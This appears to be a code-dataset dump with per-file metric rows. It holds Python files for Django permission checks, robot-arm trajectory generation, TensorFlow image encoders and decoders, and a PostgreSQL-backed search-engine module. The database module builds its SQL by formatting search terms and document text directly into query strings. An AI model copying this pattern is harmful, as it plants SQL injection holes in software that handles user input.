| 66.092308 | 247 | 0.802607 | 1,833 | 12,888 | 5.511729 | 0.135843 | 0.306246 | 0.106008 | 0.153123 | 0.76215 | 0.759576 | 0.759576 | 0.759576 | 0.754825 | 0.750272 | 0 | 0.336859 | 0.039029 | 12,888 | 194 | 248 | 66.43299 | 0.478886 | 0.19685 | 0 | 0 | 1 | 0.97541 | 0.936577 | 0.936189 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.016393 | 0 | 0.016393 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
acdf9e2ab3ff4ca175712f256961372f619e18d8 | 700 | py | Python | accounts/permissions.py | OnzeGgaaziFlow/EnvironmentMate-Backend | 39b18c1a3ac4f0dc3266b85ce70c195e6693989e | [
"MIT"
] | 1 | 2022-02-13T13:51:13.000Z | 2022-02-13T13:51:13.000Z | accounts/permissions.py | OnzeGgaaziFlow/EnvironmentMate-Backend | 39b18c1a3ac4f0dc3266b85ce70c195e6693989e | [
"MIT"
] | null | null | null | accounts/permissions.py | OnzeGgaaziFlow/EnvironmentMate-Backend | 39b18c1a3ac4f0dc3266b85ce70c195e6693989e | [
"MIT"
] | null | null | null | from rest_framework import permissions
class OnlyCanSeeAdminUser(permissions.BasePermission):
def has_permission(self, request, view):
if view.action == "list":
if request.user.is_staff == True:
return True
else:
return False
else:
return super().has_permission(request, view)
class OnlyCanAcceptAdminUser(permissions.BasePermission):
def has_permission(self, request, view):
if view.action == "create":
if request.user.is_staff == True:
return True
else:
return False
else:
return super().has_permission(request, view)
| 29.166667 | 57 | 0.591429 | 69 | 700 | 5.898551 | 0.391304 | 0.127764 | 0.137592 | 0.152334 | 0.766585 | 0.766585 | 0.766585 | 0.766585 | 0.766585 | 0.766585 | 0 | 0 | 0.328571 | 700 | 23 | 58 | 30.434783 | 0.865957 | 0 | 0 | 0.736842 | 0 | 0 | 0.014286 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.052632 | 0 | 0.578947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
c5ca0dbd25ad4c215cf83acc12eb5015981e8928 | 3,710 | py | Python | src/ellie_arm/ellie_arm/dynamixel/trajectory.py | Gin-TrungSon/EllieHumanoid | c5d958663149dad23cc1cbce7e5884eddf079792 | [
"MIT"
] | null | null | null | src/ellie_arm/ellie_arm/dynamixel/trajectory.py | Gin-TrungSon/EllieHumanoid | c5d958663149dad23cc1cbce7e5884eddf079792 | [
"MIT"
] | null | null | null | src/ellie_arm/ellie_arm/dynamixel/trajectory.py | Gin-TrungSon/EllieHumanoid | c5d958663149dad23cc1cbce7e5884eddf079792 | [
"MIT"
] | 1 | 2021-12-09T13:39:14.000Z | 2021-12-09T13:39:14.000Z | import numpy as np
import collections
class MinimumJerkTrajectory(object):
def __init__(self, initial, final, duration, init_vel=0.0, init_acc=0.0, final_vel=0.0, final_acc=0.0):
self.initial = initial
self.final = final
self.duration = duration
self.init_vel = init_vel
self.init_acc = init_acc
self.final_vel = final_vel
self.final_acc = final_acc
self.durations = [0, duration]
self.finals = [final]
self.compute()
def compute(self):
a0 = self.initial
a1 = self.init_vel
a2 = self.init_acc / 2.0
def d(x): return self.duration ** x
A = np.array([[d(3), d(4), d(5)], [3 * d(2), 4 * d(3),
5 * d(4)], [6 * d(1), 12 * d(2), 20 * d(3)]])
B = np.array([self.final - a0 - (a1 * d(1)) - (a2 * d(2)),
self.final_vel - a1 - (2 * a2 * d(1)), self.final_acc - (2 * a2)])
X = np.linalg.solve(A, B)
self.other_gen = None
self._mylambda = lambda x: a0 + a1 * x + a2 * x ** 2 + \
X[0] * x ** 3 + X[1] * x ** 4 + X[2] * x ** 5
self._generators = [self._mylambda]
def get_value(self, t):
return self._mygenerator[-1](t)
def domain(self, x):
if not isinstance(x, collections.Iterable):
x = np.array([x])
return np.array([
self.durations[0] <= xi < self.durations[1]
for xi in x
])
def test_domain(self, x):
return [((np.array(x) >= self.durations[i])) for i in range(len(self.durations) - 1)]
def fix_input(self, x):
return x if isinstance(x, collections.Iterable) else np.array([0, x])
def get_generator(self):
return lambda x: np.piecewise(x, self.domain(x), [self._generators[j] for j in range(len(self._generators))] + [self.finals[-1]])
class SinusTrajectory(object):
def __init__(self, initial, final, duration, init_vel=0.0, init_acc=0.0, final_vel=0.0, final_acc=0.0):
self.initial = initial
self.final = final
self.duration = duration
self.init_vel = init_vel
self.init_acc = init_acc
self.final_vel = final_vel
self.final_acc = final_acc
self.durations = [0, duration]
self.finals = [final]
self.compute()
def compute(self):
a0 = self.initial
a1 = self.init_vel
a2 = self.init_acc / 2.0
def d(x): return self.duration ** x
A = np.array([[d(3), d(4), d(5)], [3 * d(2), 4 * d(3),
5 * d(4)], [6 * d(1), 12 * d(2), 20 * d(3)]])
B = np.array([self.final - a0 - (a1 * d(1)) - (a2 * d(2)),
self.final_vel - a1 - (2 * a2 * d(1)), self.final_acc - (2 * a2)])
X = np.linalg.solve(A, B)
self.other_gen = None
self._mylambda = lambda x: a0 + a1 * x + a2 * x ** 2 + \
X[0] * x ** 3 + X[1] * x ** 4 + X[2] * x ** 5
self._generators = [self._mylambda]
def get_value(self, t):
return self._mygenerator[-1](t)
def domain(self, x):
if not isinstance(x, collections.Iterable):
x = np.array([x])
return np.array([
self.durations[0] <= xi < self.durations[1]
for xi in x
])
def test_domain(self, x):
return [((np.array(x) >= self.durations[i])) for i in range(len(self.durations) - 1)]
def fix_input(self, x):
return x if isinstance(x, collections.Iterable) else np.array([0, x])
def get_generator(self):
return lambda x: np.piecewise(x, self.domain(x), [self._generators[j] for j in range(len(self._generators))] + [self.finals[-1]])
| 32.26087 | 137 | 0.534771 | 556 | 3,710 | 3.456835 | 0.122302 | 0.056191 | 0.010406 | 0.062435 | 0.959417 | 0.959417 | 0.959417 | 0.959417 | 0.959417 | 0.959417 | 0 | 0.045207 | 0.308356 | 3,710 | 114 | 138 | 32.54386 | 0.703819 | 0 | 0 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.190476 | false | 0 | 0.02381 | 0.119048 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 8 |
c5f0272e1bef0acd759d606fb9e7669282573a8a | 8,058 | py | Python | codas/train/img_codec.py | xionghuichen/CODAS | 1bd0109ba11936c2de69b6b5876b15fb8be17508 | [
"MIT"
] | 6 | 2021-12-10T00:11:20.000Z | 2022-03-18T07:01:34.000Z | codas/train/img_codec.py | xionghuichen/CODAS | 1bd0109ba11936c2de69b6b5876b15fb8be17508 | [
"MIT"
] | 1 | 2021-12-20T21:28:02.000Z | 2021-12-21T14:16:01.000Z | codas/train/img_codec.py | xionghuichen/CODAS | 1bd0109ba11936c2de69b6b5876b15fb8be17508 | [
"MIT"
] | 2 | 2022-01-12T14:19:34.000Z | 2022-03-11T07:38:10.000Z | # Copyright 2019 The PlaNet Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright 2019 The PlaNet Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import tensorflow as tf
from codas.utils.tf_basic import TfBasicClass
from codas.utils import tf_util
class Encoder(TfBasicClass):
def __init__(self, scope='encoder', stack_imgs=0):
TfBasicClass.__init__(self, scope, )
self.stack_imgs = stack_imgs
def _obj_construct(self, imgs, *args, **kwargs):
"""Extract deterministic features from an observation."""
kwargs = dict(strides=2, activation=tf.nn.relu)
ndims = imgs.get_shape().ndims
if ndims == 5: # [batch, horizon, h, w, c]
if imgs.shape[1] == 1 or self.stack_imgs == 1:
stack_imgs = imgs
else:
# padding zeros
def stack_idx(idx):
pre_pad_img = tf.zeros([tf.shape(imgs)[0], idx] + imgs.shape[2:].as_list(), dtype=imgs.dtype)
post_pad_img = tf.zeros([tf.shape(imgs)[0], self.stack_imgs - 1 - idx] + imgs.shape[2:].as_list(), dtype=imgs.dtype)
stacked_imgs = tf.concat([pre_pad_img, imgs, post_pad_img], axis=1)
return stacked_imgs
idx_list = tuple(list(range(self.stack_imgs)))
st_imgs = list(map(stack_idx, idx_list))
stack_imgs = tf.concat(st_imgs, axis=-1)[:, :-1 * (self.stack_imgs - 1)]
hidden = tf.reshape(stack_imgs, [-1] + stack_imgs.shape[2:].as_list())
elif ndims == 4:
stack_imgs = imgs
hidden = imgs
else:
raise NotImplemented
hidden = tf.layers.conv2d(hidden, 32, 4, name='enc_conv1', **kwargs)
hidden = tf.layers.conv2d(hidden, 64, 4, name='enc_conv2', **kwargs)
hidden = tf.layers.conv2d(hidden, 128, 4, name='enc_conv3', **kwargs)
hidden = tf.layers.conv2d(hidden, 256, 4, name='enc_conv4', **kwargs)
hidden = tf.layers.flatten(hidden)
assert hidden.shape[1:].as_list() == [1024], hidden.shape.as_list()
# hidden = tf.layers.dense(hidden, 128, None, name='enc_fc5')
if ndims == 5:
hidden = tf.reshape(hidden, tf_util.shape(stack_imgs)[:2] + [
np.prod(hidden.shape[1:].as_list())])
return hidden
class LargeEncoder(TfBasicClass):
def __init__(self, scope='encoder', stack_imgs=0):
TfBasicClass.__init__(self, scope, )
self.stack_imgs = stack_imgs
def _obj_construct(self, imgs, *args, **kwargs):
"""Extract deterministic features from an observation."""
kwargs = dict(strides=2, activation=tf.nn.relu)
ndims = imgs.get_shape().ndims
if ndims == 5: # [batch, horizon, h, w, c]
if imgs.shape[1] == 1 or self.stack_imgs == 1:
stack_imgs = imgs
else:
# padding zeros
def stack_idx(idx):
pre_pad_img = tf.zeros([tf.shape(imgs)[0], idx] + imgs.shape[2:].as_list(), dtype=imgs.dtype)
post_pad_img = tf.zeros([tf.shape(imgs)[0], self.stack_imgs - 1 - idx] + imgs.shape[2:].as_list(), dtype=imgs.dtype)
stacked_imgs = tf.concat([pre_pad_img, imgs, post_pad_img], axis=1)
return stacked_imgs
idx_list = tuple(list(range(self.stack_imgs)))
st_imgs = list(map(stack_idx, idx_list))
stack_imgs = tf.concat(st_imgs, axis=-1)[:, :-1 * (self.stack_imgs - 1)]
hidden = tf.reshape(stack_imgs, [-1] + stack_imgs.shape[2:].as_list())
elif ndims == 4:
stack_imgs = imgs
hidden = imgs
else:
raise NotImplemented
hidden = tf.layers.conv2d(hidden, 64, 4, name='enc_conv1', **kwargs)
hidden = tf.layers.conv2d(hidden, 128, 4, name='enc_conv2', **kwargs)
hidden = tf.layers.conv2d(hidden, 256, 4, name='enc_conv3', **kwargs)
hidden = tf.layers.conv2d(hidden, 512, 4, name='enc_conv4', **kwargs)
hidden = tf.layers.conv2d(hidden, 512, 4, name='enc_conv5', **kwargs)
hidden = tf.layers.flatten(hidden)
hidden = tf.layers.dense(hidden, 1024, activation=tf.nn.relu)
assert hidden.shape[1:].as_list() == [1024], hidden.shape.as_list()
# hidden = tf.layers.dense(hidden, 128, None, name='enc_fc5')
if ndims == 5:
hidden = tf.reshape(hidden, tf_util.shape(stack_imgs)[:2] + [
np.prod(hidden.shape[1:].as_list())])
return hidden
class Decoder(TfBasicClass):
def __init__(self, scope='decoder'):
TfBasicClass.__init__(self, scope)
"""Compute the data distribution of an observation from its state."""
def _obj_construct(self, source_input, *args, **kwargs):
state, data_shape = source_input
final_channel = data_shape[2]
net_kwargs = dict(strides=2, activation=tf.nn.relu)
hidden = tf.layers.dense(state, 1024, None, name='dec_fc1')
hidden = tf.layers.dense(hidden, 2048, activation=tf.nn.relu, name='dec_fc2')
hidden = tf.reshape(hidden, [-1, 1, 1, hidden.shape[-1].value])
hidden = tf.layers.conv2d_transpose(hidden, 128, 5, name='dec_conv1', **net_kwargs)
hidden = tf.layers.conv2d_transpose(hidden, 64, 5, name='dec_conv2', **net_kwargs)
hidden = tf.layers.conv2d_transpose(hidden, 32, 6, name='dec_conv3', **net_kwargs)
mean = tf.layers.conv2d_transpose(hidden, final_channel, 6, strides=2, name='dec_conv4')
mean = tf.reshape(mean, tf_util.shape(state)[:-1] + data_shape)
return mean
class LargeDecoder(TfBasicClass):
def __init__(self, scope='decoder'):
TfBasicClass.__init__(self, scope)
"""Compute the data distribution of an observation from its state."""
def _obj_construct(self, source_input, *args, **kwargs):
state, data_shape = source_input
final_channel = data_shape[2]
net_kwargs = dict(strides=2, activation=tf.nn.relu)
hidden = tf.layers.dense(state, 1024, None, name='dec_fc1')
hidden = tf.layers.dense(hidden, 2048, None, name='dec_fc2')
hidden = tf.reshape(hidden, [-1, 1, 1, hidden.shape[-1].value])
hidden = tf.layers.conv2d_transpose(hidden, 256, 5, name='dec_conv1', **net_kwargs)
hidden = tf.layers.conv2d_transpose(hidden, 128, 5, name='dec_conv2', **net_kwargs)
hidden = tf.layers.conv2d_transpose(hidden, 64, 5, name='dec_conv3', **net_kwargs)
hidden = tf.layers.conv2d_transpose(hidden, 32, 6, name='dec_conv4', **net_kwargs)
mean = tf.layers.conv2d_transpose(hidden, final_channel, 6, strides=2, name='dec_conv5')
mean = tf.reshape(mean, tf_util.shape(state)[:-1] + data_shape)
return mean
| 49.740741 | 137 | 0.619509 | 1,086 | 8,058 | 4.436464 | 0.161142 | 0.054795 | 0.072644 | 0.066418 | 0.954961 | 0.947696 | 0.938149 | 0.938149 | 0.931922 | 0.931092 | 0 | 0.035073 | 0.253413 | 8,058 | 161 | 138 | 50.049689 | 0.765791 | 0.181435 | 0 | 0.733945 | 0 | 0 | 0.034863 | 0 | 0 | 0 | 0 | 0 | 0.018349 | 1 | 0.091743 | false | 0 | 0.036697 | 0 | 0.220183 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c5f91ed3e953d181e409154924d21e93b1a6b034 | 19,645 | py | Python | db_operations.py | JesseDesjardins/SearchEngine | 10eb3051936ac3fdad3b67c02eb1bfd97fd73703 | [
"MIT"
] | 1 | 2021-03-29T08:35:45.000Z | 2021-03-29T08:35:45.000Z | db_operations.py | JesseDesjardins/SearchEngine | 10eb3051936ac3fdad3b67c02eb1bfd97fd73703 | [
"MIT"
] | null | null | null | db_operations.py | JesseDesjardins/SearchEngine | 10eb3051936ac3fdad3b67c02eb1bfd97fd73703 | [
"MIT"
] | null | null | null | import psycopg2
import json
from config import config
# Courses functions
def get_connection():
""" Returns a connection to the database """
conn = None
try:
print("Connecting to the PostgreSQL database...")
conn = psycopg2.connect(**config())
except (Exception, psycopg2.DatabaseError) as error:
print(error)
if conn != None : print("Connected!")
return conn
def get_db_version():
""" Used as a donnection test; prints DB version """
# create a cursor
conn = get_connection()
cur = conn.cursor()
# execute a statement
print('PostgreSQL database version:')
cur.execute('SELECT version()')
# display the PostgreSQL database server version
db_version = cur.fetchone()
print(db_version)
# close the communication with the PostgreSQL
cur.close()
def insert_courses_corpus_into_db(json_file):
""" Inserts the courses corpus JSON file into the DB """
connection = get_connection()
cursor = connection.cursor()
insert_command = 'INSERT INTO corpus_u_of_o_courses.documents(docid, title, description) values '
with open(json_file) as file:
data = json.load(file)
for doc in data['documents']:
doc_id = doc['docId']
title = doc['title'] if doc['title'] != "" else None
description = doc['description'].replace("'", "''") if doc['description'] != "" else None
insert_command = insert_command + """({0}, '{1}', '{2}'),""".format(doc_id, title, description)
insert_command = insert_command[:-1] + ';' # Removes trailing comma
try:
print('Inserting courses into db...')
cursor.execute(insert_command)
cursor.close()
connection.commit()
print('Success!')
except(Exception) as error:
print(error)
def insert_courses_dictionary_into_db(json_file):
""" Inserts the courses dictionary JSON file into the DB """
connection = get_connection()
cursor = connection.cursor()
insert_command = 'INSERT INTO corpus_u_of_o_courses.dictionary(word, docid) values '
with open(json_file) as infile:
data = json.load(infile)
for doc in data['words']:
insert_command = insert_command + """('{0}', {1}),""".format(doc['word'], doc['docid'])
insert_command = insert_command[:-1] + ';' # Removes trailing comma
try:
print('Inserting courses dictionary into db...')
cursor.execute(insert_command)
cursor.close()
connection.commit()
print('Success!')
except(Exception) as error:
print(error)
def insert_courses_inverted_index_into_db(json_file):
""" Inserts the courses inverted index JSON file into the DB """
connection = get_connection()
cursor = connection.cursor()
insert_postings_command = 'INSERT INTO corpus_u_of_o_courses.inverted_matrix_postings(posting_id, doc_id, term_freq) values '
insert_terms_command = 'INSERT INTO corpus_u_of_o_courses.inverted_matrix_terms(term_id, term, doc_freq) values '
insert_foreign_keys_command = 'INSERT INTO corpus_u_of_o_courses.inverted_matrix_terms_postings(term_id, posting_id) values '
postings_id = 0
term_id = 0
data = {}
with open(json_file) as infile:
data = json.load(infile)
for term in data['index']:
term_id += 1
insert_terms_command = insert_terms_command + "({0}, '{1}', {2}),".format(term_id, term['term'], term['doc_freq'])
term_postings = []
for posting in term['postings_list']:
postings_id += 1
insert_postings_command = insert_postings_command + "({0}, {1}, {2}),".format(postings_id, posting[0], posting[1])
term_postings.append(postings_id)
for posting_id in term_postings:
insert_foreign_keys_command = insert_foreign_keys_command + "({0}, {1}),".format(term_id, posting_id)
insert_terms_command = insert_terms_command[:-1] + ';'
insert_postings_command = insert_postings_command[:-1] + ';'
insert_foreign_keys_command = insert_foreign_keys_command[:-1] + ';'
try:
print('Inserting inverted index data into db...')
cursor.execute(insert_terms_command)
cursor.execute(insert_postings_command)
cursor.execute(insert_foreign_keys_command)
cursor.close()
connection.commit()
print('Success!')
except(Exception) as error:
print(error)
def retrieve_courses_documents(doc_ids):
""" Retrieves the course documents associated with the given list of IDs
Return
------
list of tuple
A list of tuples of docid, title and description
"""
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT docid, title, description FROM corpus_u_of_o_courses.documents WHERE docid IN ('
for id in doc_ids:
select_command = select_command + '{},'.format(id)
if select_command[-1] == ',':
select_command = select_command[:-1] + ');'
else:
select_command = select_command + ');'
try:
cursor.execute(select_command)
docs = cursor.fetchall()
except(Exception) as error:
docs = None
print(error)
return docs
def retrieve_courses_documents_not(doc_ids):
""" Retrieves all the course documents not associated with the given list of IDs """
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT docid, title, description FROM corpus_u_of_o_courses.documents WHERE docid NOT IN ('
for id in doc_ids:
select_command = select_command + '{},'.format(id)
select_command = select_command[:-1] + ');'
try:
cursor.execute(select_command)
docs = cursor.fetchall()
cursor.close()
except(Exception) as error:
docs = None
print(error)
return docs
def retrieve_courses_doc_ids_from_term(term):
""" Returns all doc_ids for docs where term is present """
connection = get_connection()
cursor = connection.cursor()
select_command = """SELECT p.doc_id from corpus_u_of_o_courses.inverted_matrix_terms t,
corpus_u_of_o_courses.inverted_matrix_postings p,
corpus_u_of_o_courses.inverted_matrix_terms_postings tp
WHERE t.term = '{0}' AND tp.term_id = t.term_id AND p.posting_id = tp.posting_id;""".format(term)
try:
cursor.execute(select_command)
doc_ids = cursor.fetchall()
cursor.close()
except(Exception) as error:
doc_ids = None
print(error)
return [doc_id[0] for doc_id in doc_ids] # doc_ids is list of tuples of 1 int; simplyfy to a list of ints
def retrieve_courses_doc_ids_from_terms(terms):
""" Returns all doc_ids for docs where any terms in the list are present """
connection = get_connection()
cursor = connection.cursor()
select_command = """SELECT p.doc_id from corpus_u_of_o_courses.inverted_matrix_terms t,
corpus_u_of_o_courses.inverted_matrix_postings p,
corpus_u_of_o_courses.inverted_matrix_terms_postings tp
WHERE t.term in ("""
for term in terms:
select_command = select_command + "'{}',".format(term)
if select_command[-1] == ',':
select_command = select_command[:-1] + ') AND tp.term_id = t.term_id AND p.posting_id = tp.posting_id;'
else:
select_command = select_command + ') AND tp.term_id = t.term_id AND p.posting_id = tp.posting_id;'
try:
cursor.execute(select_command)
doc_ids = cursor.fetchall()
cursor.close()
except(Exception) as error:
doc_ids = None
print(error)
return [doc_id[0] for doc_id in doc_ids] # doc_ids is list of tuples of 1 int; simplyfy to a list of ints
def retrieve_courses_doc_ids_not_from_term(term):
""" Returns all doc_ids for docs where term is not present """
doc_ids = retrieve_courses_doc_ids_from_term(term)
connection = get_connection()
cursor = connection.cursor()
select_command = "SELECT docid from corpus_u_of_o_courses.documents WHERE docid NOT IN ("
for id in doc_ids:
select_command = select_command + '{},'.format(id)
select_command = select_command[:-1] + ');'
try:
cursor.execute(select_command)
doc_ids = cursor.fetchall()
cursor.close()
except(Exception) as error:
doc_ids = None
print(error)
return [doc_id[0] for doc_id in doc_ids] # doc_ids is list of tuples of 1 int; simplyfy to a list of ints
def retrieve_courses_doc_ids_not_from_set(doc_ids):
""" Returns all doc_ids for docs that aren't associated with doc_ids """
connection = get_connection()
cursor = connection.cursor()
select_command = "SELECT docid from corpus_u_of_o_courses.documents WHERE docid NOT IN ("
for id in doc_ids:
select_command = select_command + '{},'.format(id)
select_command = select_command[:-1] + ');'
try:
cursor.execute(select_command)
doc_ids = cursor.fetchall()
cursor.close()
except(Exception) as error:
doc_ids = None
print(error)
return [doc_id[0] for doc_id in doc_ids] # doc_ids is list of tuples of 1 int; simplify to a list of ints
def retrieve_courses_all_terms():
""" Retrieves a list of all terms from the inverted matrix index """
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT term FROM corpus_u_of_o_courses.inverted_matrix_terms;'
try:
cursor.execute(select_command)
terms = cursor.fetchall()
except(Exception) as error:
terms = None
print(error)
return [term[0] for term in terms] # terms is list of tuples of 1 string; simplify to a list of strings
def retrieve_courses_all_terms_and_doc_freqs():
""" Retrieves a list of tuples all terms and their doccument frequencies from the inverted matrix index """
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT term, doc_freq FROM corpus_u_of_o_courses.inverted_matrix_terms;'
try:
cursor.execute(select_command)
pairs = cursor.fetchall()
except(Exception) as error:
pairs = None
print(error)
return pairs
def retrieve_courses_all_documents_count():
""" Retrieves a count of all documents in the corpus """
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT COUNT(*) FROM corpus_u_of_o_courses.documents;'
try:
cursor.execute(select_command)
count = cursor.fetchone()
except(Exception) as error:
count = None
print(error)
return count[0]
def retrieve_courses_all_terms_count():
""" Retrieves a count of all unique terms in the corpus """
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT COUNT(*) FROM corpus_u_of_o_courses.inverted_matrix_terms;'
try:
cursor.execute(select_command)
count = cursor.fetchone()
except(Exception) as error:
count = None
print(error)
return count[0]
def retrieve_courses_all_document_ids():
""" Retrieves all document ids in the corpus """
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT docid FROM corpus_u_of_o_courses.documents;'
try:
cursor.execute(select_command)
doc_ids = cursor.fetchall()
except(Exception) as error:
doc_ids = None
print(error)
return [doc_id[0] for doc_id in doc_ids]
# Reuters Functions
def insert_reuters_corpus_into_db(json_file):
""" Inserts the reuters documents corpus JSON file into the DB """
connection = get_connection()
cursor = connection.cursor()
insert_command = 'INSERT INTO corpus_reuters.documents(docid, title, body, topics) values '
with open(json_file) as file:
data = json.load(file)
for doc in data['documents']:
doc_id = doc['docId']
title = doc['title'].replace("'", "''") if doc['title'] != "" else None
body = doc['body'].replace("'", "''") if doc['body'] != "" else None
topics = doc['topics'].replace("'", "''") if doc['topics'] != "" else None
insert_command = insert_command + """({0}, '{1}', '{2}', '{3}'),""".format(doc_id, title, body, topics)
insert_command = insert_command[:-1] + ';' # Removes trailing comma
try:
print('Inserting documents into db...')
cursor.execute(insert_command)
cursor.close()
connection.commit()
print('Success!')
except(Exception) as error:
print(error)
def insert_reuters_dictionary_into_db(json_file):
""" Inserts the reuters dictionary JSON file into the DB """
connection = get_connection()
cursor = connection.cursor()
insert_command = 'INSERT INTO corpus_reuters.dictionary(word, docid) values '
with open(json_file) as infile:
data = json.load(infile)
for doc in data['words']:
insert_command = insert_command + """('{0}', {1}),""".format(doc['word'], doc['docid'])
insert_command = insert_command[:-1] + ';' # Removes trailing comma
try:
print('Inserting reuters dictionary into db...')
cursor.execute(insert_command)
cursor.close()
connection.commit()
print('Success!')
except(Exception) as error:
print(error)
def insert_reuters_inverted_index_into_db(json_file):
""" Inserts the reuters inverted index JSON file into the DB """
connection = get_connection()
cursor = connection.cursor()
print("Generating insert query...")
insert_index_command = 'INSERT INTO corpus_reuters.inverted_matrix_terms_postings(term_id, term, doc_freq, doc_id_term_freq_tuple) values '
postings_id = 0
term_id = 0
data = {}
with open(json_file) as infile:
data = json.load(infile)
for term in data['index']:
term_id += 1
insert_index_command = insert_index_command + "({0}, '{1}', {2}, '{{".format(term_id, term['term'], term['doc_freq'])
term_postings = []
for posting in term['postings_list']:
insert_index_command = insert_index_command + """{{"{0}", "{1}"}},""".format(posting[0], posting[1])
insert_index_command = insert_index_command[:-1] + "}')," # closes array insert
insert_index_command = insert_index_command[:-1] + ";" # removes trailing comma
try:
print('Inserting inverted index data into db...')
cursor.execute(insert_index_command)
cursor.close()
connection.commit()
print('Success!')
except(Exception) as error:
print(error)
def retrieve_reuters_documents(doc_ids):
""" Retrieves the reuter documents associated with the given list of IDs
Return
------
list of tuple
A list of tuples of docid, title, body and topics
"""
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT docid, title, body, topics FROM corpus_reuters.documents WHERE docid IN ('
for id in doc_ids:
select_command = select_command + '{},'.format(id)
if select_command[-1] == ',':
select_command = select_command[:-1] + ');'
else:
select_command = select_command + ');'
try:
cursor.execute(select_command)
docs = cursor.fetchall()
except(Exception) as error:
docs = None
print(error)
return docs
def retrieve_reuters_all_terms():
""" Retrieves a list of all terms from the inverted matrix index """
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT term FROM corpus_reuters.inverted_matrix_terms;'
try:
cursor.execute(select_command)
terms = cursor.fetchall()
except(Exception) as error:
terms = None
print(error)
return [term[0] for term in terms] # terms is list of tuples of 1 string; simplify to a list of strings
def retrieve_reuters_doc_ids_from_terms(terms):
""" Returns all doc_ids for docs where any terms in the list are present """
connection = get_connection()
cursor = connection.cursor()
select_command = "SELECT doc_id_term_freq_tuple from corpus_reuters.inverted_matrix_terms_postings WHERE term in ("
for term in terms:
select_command = select_command + "'{}',".format(term)
if select_command[-1] == ',':
select_command = select_command[:-1] + ');'
else:
select_command = select_command + ');'
try:
cursor.execute(select_command)
doc_id_term_freq_tuples = cursor.fetchall()
cursor.close()
except(Exception) as error:
doc_id_term_freq_tuples = None
print(error)
doc_ids = []
for tpl in doc_id_term_freq_tuples:
for inner_tpl in tpl:
for more_inner_tpl in inner_tpl:
doc_ids.append(more_inner_tpl[0])
return doc_ids
def retrieve_reuters_doc_ids_not_from_set(doc_ids):
""" Returns all doc_ids for docs that aren't associated with doc_ids """
connection = get_connection()
cursor = connection.cursor()
select_command = "SELECT docid from corpus_reuters.documents WHERE docid NOT IN ("
for id in doc_ids:
select_command = select_command + '{},'.format(id)
select_command = select_command[:-1] + ');'
try:
cursor.execute(select_command)
doc_ids = cursor.fetchall()
cursor.close()
except(Exception) as error:
doc_ids = None
print(error)
return [doc_id[0] for doc_id in doc_ids] # doc_ids is list of tuples of 1 int; simplify to a list of ints
def retrieve_reuters_all_documents_count():
""" Retrieves a count of all documents in the corpus """
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT COUNT(*) FROM corpus_reuters.documents;'
try:
cursor.execute(select_command)
count = cursor.fetchone()
except(Exception) as error:
count = None
print(error)
return count[0]
def retrieve_reuters_all_terms_count():
""" Retrieves a count of all unique terms in the corpus """
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT COUNT(*) FROM corpus_reuters.inverted_matrix_terms_postings;'
try:
cursor.execute(select_command)
count = cursor.fetchone()
except(Exception) as error:
count = None
print(error)
return count[0]
def retrieve_reuters_all_terms_and_doc_freqs():
""" Retrieves a list of tuples all terms and their doccument frequencies from the inverted matrix index """
connection = get_connection()
cursor = connection.cursor()
select_command = 'SELECT term, doc_freq FROM corpus_reuters.inverted_matrix_terms_postings;'
try:
cursor.execute(select_command)
pairs = cursor.fetchall()
except(Exception) as error:
pairs = None
print(error)
return pairs
if __name__ == "__main__":
get_db_version()
# insert_reuters_dictionary_into_db("reuters_dictionary.json")
# insert_reuters_inverted_index_into_db("reuters_inverted_index.json")
print(retrieve_reuters_documents([133, 1]))
